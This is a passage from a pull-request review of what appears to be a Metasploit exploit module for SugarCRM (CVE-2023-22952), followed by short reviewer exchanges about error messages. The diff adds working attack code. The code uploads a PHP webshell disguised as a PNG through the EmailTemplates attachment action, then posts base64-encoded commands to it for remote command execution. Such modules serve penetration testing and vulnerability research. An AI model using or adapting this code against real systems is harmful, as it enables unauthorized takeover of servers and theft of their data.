modules/exploits/linux/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -0,0 +1,247 @@
+    if res && res.code == 500 && !res.body.blank?
+      return true
+    else
+      return false
+    end
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    return nil
+  end
+
+  def upload_webshell
+    # randomize file name and extension if option WEBSHELL is not set
+    file_ext = ['phar', 'phtml']
+    if datastore['WEBSHELL'].blank?
+      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}"
+    else
+      @webshell_name = datastore['WEBSHELL'].to_s
+    end
+
+    png_webshell = Base64.strict_decode64(PNG_B64_WEBSHELL)
+
+    # construct multipart form data based on Chrome browser fingerprint
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(16)}"
+    form_data = "--#{boundary}\r\n"
+    form_data << "Content-Disposition: form-data; name=\"action\"\r\n"
+    form_data << "\r\n"
+    form_data << "AttachFiles\r\n"
+    form_data << "--#{boundary}\r\n"
+    form_data << "Content-Disposition: form-data; name=\"module\"\r\n"
+    form_data << "\r\n"
+    form_data << "EmailTemplates\r\n"
+    form_data << "--#{boundary}\r\n"
+    form_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{@webshell_name}\"\r\n"
+    form_data << "Content-Type: image/png\r\n"
+    form_data << "\r\n"
+    form_data << png_webshell.to_s
+    form_data << "\r\n"
+    form_data << "--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => form_data
+    })
+    if res && res.code == 200 && !res.body.blank? && res.body =~ /#{@webshell_name}/
+      return true
+    else
+      return false
+    end
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    return nil
+  end
+
+  def check_vuln(cmd)
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cache', 'images', @webshell_name),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'c' => payload
+      }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    return nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cache', 'images', @webshell_name),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'c' => payload
+      }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
```

Comment:
Same again.

Reply:
Yep, will change the message.

Reply:
Same, removed. https://github.com/rapid7/metasploit-framework/pull/17507/commits/04f8d62c43c22ef899b5a9fcba4567bc9ad025a3